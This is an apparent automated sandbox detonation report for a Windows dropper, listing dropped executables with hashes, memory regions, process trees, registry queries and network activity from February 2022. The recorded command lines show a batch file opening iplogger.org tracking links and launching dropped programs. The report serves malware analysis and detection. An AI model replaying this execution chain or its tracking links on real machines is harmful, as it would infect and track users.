SHA256 a7e98ba4e9b3149d35cbf64b09bc727b5136ec8375a366ca42d66d1c4fc9e25c
SHA512 84c00731b0724a09d82410c5b0fe40d910c62076ae9fa10a385d084d4dffad5b194b38fd92d48b5fa1991b2fd6e8a370d5f4c43e7f09b424c65c41356ff48f29

\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe

MD5 010ebf726b3cc67e92eb91d7afbfbd59
SHA1 02db1d5bf39903099612ddb12d4b8918657f0ec0
SHA256 a7e98ba4e9b3149d35cbf64b09bc727b5136ec8375a366ca42d66d1c4fc9e25c
SHA512 84c00731b0724a09d82410c5b0fe40d910c62076ae9fa10a385d084d4dffad5b194b38fd92d48b5fa1991b2fd6e8a370d5f4c43e7f09b424c65c41356ff48f29

C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe

MD5 010ebf726b3cc67e92eb91d7afbfbd59
SHA1 02db1d5bf39903099612ddb12d4b8918657f0ec0
SHA256 a7e98ba4e9b3149d35cbf64b09bc727b5136ec8375a366ca42d66d1c4fc9e25c
SHA512 84c00731b0724a09d82410c5b0fe40d910c62076ae9fa10a385d084d4dffad5b194b38fd92d48b5fa1991b2fd6e8a370d5f4c43e7f09b424c65c41356ff48f29

\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe

MD5 7f6e60001d89e148fabb62ae3b5301ed
SHA1 02679bae2da92b2fc28e5e5e7905fcdeb3382202
SHA256 708a840263c9db1015413c9f186cc52f965d15d26337ecc5c7110b44db955939
SHA512 1bc54d09b1b413676b4e952a80602791e06f64622b7eb81eb50de005c86d9c5c3c49e45bc09cf077ebb94a69db5f8b129c2cac286a96ab3091ffa38b103d4e90

\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe

MD5 7f6e60001d89e148fabb62ae3b5301ed
SHA1 02679bae2da92b2fc28e5e5e7905fcdeb3382202
SHA256 708a840263c9db1015413c9f186cc52f965d15d26337ecc5c7110b44db955939
SHA512 1bc54d09b1b413676b4e952a80602791e06f64622b7eb81eb50de005c86d9c5c3c49e45bc09cf077ebb94a69db5f8b129c2cac286a96ab3091ffa38b103d4e90

\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe

MD5 7f6e60001d89e148fabb62ae3b5301ed
SHA1 02679bae2da92b2fc28e5e5e7905fcdeb3382202
SHA256 708a840263c9db1015413c9f186cc52f965d15d26337ecc5c7110b44db955939
SHA512 1bc54d09b1b413676b4e952a80602791e06f64622b7eb81eb50de005c86d9c5c3c49e45bc09cf077ebb94a69db5f8b129c2cac286a96ab3091ffa38b103d4e90

\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe

MD5 7f6e60001d89e148fabb62ae3b5301ed
SHA1 02679bae2da92b2fc28e5e5e7905fcdeb3382202
SHA256 708a840263c9db1015413c9f186cc52f965d15d26337ecc5c7110b44db955939
SHA512 1bc54d09b1b413676b4e952a80602791e06f64622b7eb81eb50de005c86d9c5c3c49e45bc09cf077ebb94a69db5f8b129c2cac286a96ab3091ffa38b103d4e90

C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe

MD5 7f6e60001d89e148fabb62ae3b5301ed
SHA1 02679bae2da92b2fc28e5e5e7905fcdeb3382202
SHA256 708a840263c9db1015413c9f186cc52f965d15d26337ecc5c7110b44db955939
SHA512 1bc54d09b1b413676b4e952a80602791e06f64622b7eb81eb50de005c86d9c5c3c49e45bc09cf077ebb94a69db5f8b129c2cac286a96ab3091ffa38b103d4e90

memory/1656-80-0x0000000000170000-0x000000000017D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe

MD5 010ebf726b3cc67e92eb91d7afbfbd59
SHA1 02db1d5bf39903099612ddb12d4b8918657f0ec0
SHA256 a7e98ba4e9b3149d35cbf64b09bc727b5136ec8375a366ca42d66d1c4fc9e25c
SHA512 84c00731b0724a09d82410c5b0fe40d910c62076ae9fa10a385d084d4dffad5b194b38fd92d48b5fa1991b2fd6e8a370d5f4c43e7f09b424c65c41356ff48f29

C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe

MD5 ddd8a43c5cd1d648af5bfbd67c718261
SHA1 37c915768cb12f54b60eac36cd4c008d7b3340b6
SHA256 159d88ddd564a79129ae91354087369b36d27cad9bde5cc66ac50becae5e7786
SHA512 08268136b5d1245ae4e828205ae4d6efec6845b4ed1507f44520a94f5746837781baddee3910f4b0b0c102b49e4ceceefd8cace686ca8dfed6605af4cf967efb

\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe

MD5 ddd8a43c5cd1d648af5bfbd67c718261
SHA1 37c915768cb12f54b60eac36cd4c008d7b3340b6
SHA256 159d88ddd564a79129ae91354087369b36d27cad9bde5cc66ac50becae5e7786
SHA512 08268136b5d1245ae4e828205ae4d6efec6845b4ed1507f44520a94f5746837781baddee3910f4b0b0c102b49e4ceceefd8cace686ca8dfed6605af4cf967efb

\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe

MD5 ddd8a43c5cd1d648af5bfbd67c718261
SHA1 37c915768cb12f54b60eac36cd4c008d7b3340b6
SHA256 159d88ddd564a79129ae91354087369b36d27cad9bde5cc66ac50becae5e7786
SHA512 08268136b5d1245ae4e828205ae4d6efec6845b4ed1507f44520a94f5746837781baddee3910f4b0b0c102b49e4ceceefd8cace686ca8dfed6605af4cf967efb

\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe

MD5 ddd8a43c5cd1d648af5bfbd67c718261
SHA1 37c915768cb12f54b60eac36cd4c008d7b3340b6
SHA256 159d88ddd564a79129ae91354087369b36d27cad9bde5cc66ac50becae5e7786
SHA512 08268136b5d1245ae4e828205ae4d6efec6845b4ed1507f44520a94f5746837781baddee3910f4b0b0c102b49e4ceceefd8cace686ca8dfed6605af4cf967efb

\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe

MD5 ddd8a43c5cd1d648af5bfbd67c718261
SHA1 37c915768cb12f54b60eac36cd4c008d7b3340b6
SHA256 159d88ddd564a79129ae91354087369b36d27cad9bde5cc66ac50becae5e7786
SHA512 08268136b5d1245ae4e828205ae4d6efec6845b4ed1507f44520a94f5746837781baddee3910f4b0b0c102b49e4ceceefd8cace686ca8dfed6605af4cf967efb

C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe

MD5 ddd8a43c5cd1d648af5bfbd67c718261
SHA1 37c915768cb12f54b60eac36cd4c008d7b3340b6
SHA256 159d88ddd564a79129ae91354087369b36d27cad9bde5cc66ac50becae5e7786
SHA512 08268136b5d1245ae4e828205ae4d6efec6845b4ed1507f44520a94f5746837781baddee3910f4b0b0c102b49e4ceceefd8cace686ca8dfed6605af4cf967efb

memory/1812-92-0x00000000021C0000-0x00000000022A3000-memory.dmp

memory/1812-93-0x0000000002070000-0x0000000002170000-memory.dmp

memory/1812-94-0x00000000021C0000-0x00000000022A3000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 28d2b5233db11fb15d47576c7fce937c
SHA1 1cba316afc3c76d84f95a0f6e1d5bb61dd0356a3
SHA256 99e44262f35aeaca90c303485b5f01aa42cdeab6909f011dd61f28ca9586aeca
SHA512 7185216e98475cf748de9c136270f27a13dde3aee2f26df27b116d76fff8aecce31dbd6fdfd8ee3a0c71fd77f013f54d3da8799bd597e2b9b302e1603e8356fe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe

MD5 7f6e60001d89e148fabb62ae3b5301ed
SHA1 02679bae2da92b2fc28e5e5e7905fcdeb3382202
SHA256 708a840263c9db1015413c9f186cc52f965d15d26337ecc5c7110b44db955939
SHA512 1bc54d09b1b413676b4e952a80602791e06f64622b7eb81eb50de005c86d9c5c3c49e45bc09cf077ebb94a69db5f8b129c2cac286a96ab3091ffa38b103d4e90

\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 28d2b5233db11fb15d47576c7fce937c
SHA1 1cba316afc3c76d84f95a0f6e1d5bb61dd0356a3
SHA256 99e44262f35aeaca90c303485b5f01aa42cdeab6909f011dd61f28ca9586aeca
SHA512 7185216e98475cf748de9c136270f27a13dde3aee2f26df27b116d76fff8aecce31dbd6fdfd8ee3a0c71fd77f013f54d3da8799bd597e2b9b302e1603e8356fe

\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 28d2b5233db11fb15d47576c7fce937c
SHA1 1cba316afc3c76d84f95a0f6e1d5bb61dd0356a3
SHA256 99e44262f35aeaca90c303485b5f01aa42cdeab6909f011dd61f28ca9586aeca
SHA512 7185216e98475cf748de9c136270f27a13dde3aee2f26df27b116d76fff8aecce31dbd6fdfd8ee3a0c71fd77f013f54d3da8799bd597e2b9b302e1603e8356fe

\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 28d2b5233db11fb15d47576c7fce937c
SHA1 1cba316afc3c76d84f95a0f6e1d5bb61dd0356a3
SHA256 99e44262f35aeaca90c303485b5f01aa42cdeab6909f011dd61f28ca9586aeca
SHA512 7185216e98475cf748de9c136270f27a13dde3aee2f26df27b116d76fff8aecce31dbd6fdfd8ee3a0c71fd77f013f54d3da8799bd597e2b9b302e1603e8356fe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 28d2b5233db11fb15d47576c7fce937c
SHA1 1cba316afc3c76d84f95a0f6e1d5bb61dd0356a3
SHA256 99e44262f35aeaca90c303485b5f01aa42cdeab6909f011dd61f28ca9586aeca
SHA512 7185216e98475cf748de9c136270f27a13dde3aee2f26df27b116d76fff8aecce31dbd6fdfd8ee3a0c71fd77f013f54d3da8799bd597e2b9b302e1603e8356fe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 28d2b5233db11fb15d47576c7fce937c
SHA1 1cba316afc3c76d84f95a0f6e1d5bb61dd0356a3
SHA256 99e44262f35aeaca90c303485b5f01aa42cdeab6909f011dd61f28ca9586aeca
SHA512 7185216e98475cf748de9c136270f27a13dde3aee2f26df27b116d76fff8aecce31dbd6fdfd8ee3a0c71fd77f013f54d3da8799bd597e2b9b302e1603e8356fe

memory/1624-103-0x0000000000400000-0x0000000000425000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp

MD5 f897ff6640b2528ae0e3211e9240e79f
SHA1 dc6e47b975423894cb812552bb4aa00c6a57b214
SHA256 24f28a4003cdbd3c50eea654213bb12ae94edcfab5e35fad23e72637b2e86640
SHA512 14ccbac9f018268c19a116d9c4478201d6a5a9a086dce3e5d2e3dac9353c015ccaf624ac7f999ddb41fc59b9c7601d096723eb7129d5859d1147b7540a2b6851

C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp

MD5 f897ff6640b2528ae0e3211e9240e79f
SHA1 dc6e47b975423894cb812552bb4aa00c6a57b214
SHA256 24f28a4003cdbd3c50eea654213bb12ae94edcfab5e35fad23e72637b2e86640
SHA512 14ccbac9f018268c19a116d9c4478201d6a5a9a086dce3e5d2e3dac9353c015ccaf624ac7f999ddb41fc59b9c7601d096723eb7129d5859d1147b7540a2b6851

memory/1656-108-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/1656-109-0x0000000070E51000-0x0000000070E53000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp

MD5 f897ff6640b2528ae0e3211e9240e79f
SHA1 dc6e47b975423894cb812552bb4aa00c6a57b214
SHA256 24f28a4003cdbd3c50eea654213bb12ae94edcfab5e35fad23e72637b2e86640
SHA512 14ccbac9f018268c19a116d9c4478201d6a5a9a086dce3e5d2e3dac9353c015ccaf624ac7f999ddb41fc59b9c7601d096723eb7129d5859d1147b7540a2b6851

\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe

MD5 7f9a498cc692f9f3f0cfe241c80e8ad8
SHA1 b5c3f7322da2c8b8ce0f473a26b54d057593162e
SHA256 953367b0ce6b0ebf5dda2477828e5a7750b072700d9c96c29136f152d0c3f489
SHA512 8fa1b099c07e5aa352a6c5d0288ffd1ce0c5208fda361bb0129c03fbc16d3a84d12fa6067d143e82795343d9c3c847e35ec6b6638373329467d9025933766db6

C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe

MD5 7f9a498cc692f9f3f0cfe241c80e8ad8
SHA1 b5c3f7322da2c8b8ce0f473a26b54d057593162e
SHA256 953367b0ce6b0ebf5dda2477828e5a7750b072700d9c96c29136f152d0c3f489
SHA512 8fa1b099c07e5aa352a6c5d0288ffd1ce0c5208fda361bb0129c03fbc16d3a84d12fa6067d143e82795343d9c3c847e35ec6b6638373329467d9025933766db6

\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe

MD5 7de995f043de78c13ac79349852bf124
SHA1 23b37d08012bfaa8743359eba29ec8891e23897f
SHA256 9ed80faeb92fd61026b7bf3eb0e080c87cc49c630e77c387acecd4d5c0d34f98
SHA512 7ed1fb7a6be43233a805c5e1593491c8cf29f1dfd43d5f4147ae1c3835639dd62e859d8c0bbe7bf7afc8e697c3b1808e04c16f2ec0c509ac74da8a3f7c566300

\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe

MD5 7de995f043de78c13ac79349852bf124
SHA1 23b37d08012bfaa8743359eba29ec8891e23897f
SHA256 9ed80faeb92fd61026b7bf3eb0e080c87cc49c630e77c387acecd4d5c0d34f98
SHA512 7ed1fb7a6be43233a805c5e1593491c8cf29f1dfd43d5f4147ae1c3835639dd62e859d8c0bbe7bf7afc8e697c3b1808e04c16f2ec0c509ac74da8a3f7c566300

\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe

MD5 7de995f043de78c13ac79349852bf124
SHA1 23b37d08012bfaa8743359eba29ec8891e23897f
SHA256 9ed80faeb92fd61026b7bf3eb0e080c87cc49c630e77c387acecd4d5c0d34f98
SHA512 7ed1fb7a6be43233a805c5e1593491c8cf29f1dfd43d5f4147ae1c3835639dd62e859d8c0bbe7bf7afc8e697c3b1808e04c16f2ec0c509ac74da8a3f7c566300

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe

MD5 7de995f043de78c13ac79349852bf124
SHA1 23b37d08012bfaa8743359eba29ec8891e23897f
SHA256 9ed80faeb92fd61026b7bf3eb0e080c87cc49c630e77c387acecd4d5c0d34f98
SHA512 7ed1fb7a6be43233a805c5e1593491c8cf29f1dfd43d5f4147ae1c3835639dd62e859d8c0bbe7bf7afc8e697c3b1808e04c16f2ec0c509ac74da8a3f7c566300

\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt

MD5 b7161c0845a64ff6d7345b67ff97f3b0
SHA1 d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256 fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA512 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe

MD5 7de995f043de78c13ac79349852bf124
SHA1 23b37d08012bfaa8743359eba29ec8891e23897f
SHA256 9ed80faeb92fd61026b7bf3eb0e080c87cc49c630e77c387acecd4d5c0d34f98
SHA512 7ed1fb7a6be43233a805c5e1593491c8cf29f1dfd43d5f4147ae1c3835639dd62e859d8c0bbe7bf7afc8e697c3b1808e04c16f2ec0c509ac74da8a3f7c566300

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b4753d14cf15006efdebd928d17782fe
SHA1 27364202233e704bd93b15839a8820b23ffed8f5
SHA256 356bbfbe1c560cddf0167204f84766d1e8d6cd1889904a4b6989ba7a73898a92
SHA512 73f894568bb53493480218f6264ff453056160c640144c5b64420f0682af1d8d8918552edfb31eee9582682a1b332a652befacc5fabce53e2cb06316f5e488e2

\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

MD5 a6279ec92ff948760ce53bba817d6a77
SHA1 5345505e12f9e4c6d569a226d50e71b5a572dce2
SHA256 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

MD5 a6279ec92ff948760ce53bba817d6a77
SHA1 5345505e12f9e4c6d569a226d50e71b5a572dce2
SHA256 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

MD5 a6279ec92ff948760ce53bba817d6a77
SHA1 5345505e12f9e4c6d569a226d50e71b5a572dce2
SHA256 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

MD5 a6279ec92ff948760ce53bba817d6a77
SHA1 5345505e12f9e4c6d569a226d50e71b5a572dce2
SHA256 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt

MD5 b7161c0845a64ff6d7345b67ff97f3b0
SHA1 d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256 fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA512 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a59d9b159e7ad93c024ec57c7e895969
SHA1 003a298d1d450e69cf6cb0d9ba1fa00393872c5c
SHA256 cc89f5dba74c57f53fb37f1906b7c0f430379331f7cfa20f6491e69490cb13d2
SHA512 8e4643eccb569a352a4e3ed76f393f6f90e47897d627b096f1121f3c604ed6485d101a3359e16edd05208005902711ccc1bc72227ca6aeb480cbbc97abebbfb3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6DX42UNT.txt

MD5 18d0c71b6f5f4fee3ef9ad423101ef82
SHA1 2cc73d29382730dbe5c9da8224cdefdcad5b28dd
SHA256 5f40872a7e0e4f665d8ee10a64b763c21dcfec6e93d17a1d5446715a68bf6d7d
SHA512 fab833a8bfd6cf192d11649b35464649d6c8218271a2e0a69858015f5f0ba9defd00b461e5466bd4f66e320e66ffc5a963d2f40373d080ee15854da74b25a8a2

Analysis: behavioral2

Detonation Overview

Submitted

2022-02-06 13:12

Reported

2022-02-06 13:15

Platform

win10v2004-en-20220113

Max time kernel

36s

Max time network

89s

Command Line

"C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2696 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 2696 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 2696 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 4572 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4572 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4572 wrote to memory of 4068 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4572 wrote to memory of 4068 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2300 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2300 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2696 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
PID 2696 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
PID 2696 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

Processes

C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe

"C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1qzLu7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/14Ahe7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf6eb46f8,0x7ffbf6eb4708,0x7ffbf6eb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf6eb46f8,0x7ffbf6eb4708,0x7ffbf6eb4718

C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe"

Network

Country Destination Domain Proto
NL 88.221.144.170:80 tcp
NL 88.221.144.170:80 tcp
US 8.8.8.8:53 settings-win.data.microsoft.com udp
US 52.167.249.196:443 settings-win.data.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat

MD5 c25faf98d787b358c72543e7e11917c8
SHA1 911d1eb09ba90b071795842089d57d741f959ee3
SHA256 86d72c90e984ebbaf8917bc49c16a68752f8e1e73e59f61eb004eb0b92e1ad40
SHA512 b7e97564dcccc813cda0d6632fb5229a231b2606c2a3b01addb0b2889e7b20c433760b95b7f8273ff2fa423a848fde7aa8ef13b52605e93520b7475815cc2720

C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 78afdcc28744f3ccc897189551e60a14
SHA1 6408c2447363d821dc659254a324456ed16207ec
SHA256 ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7
SHA512 8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078